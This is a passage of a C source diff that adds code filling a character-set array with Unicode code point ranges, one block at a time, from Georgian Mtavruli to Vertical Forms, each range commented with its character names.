+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
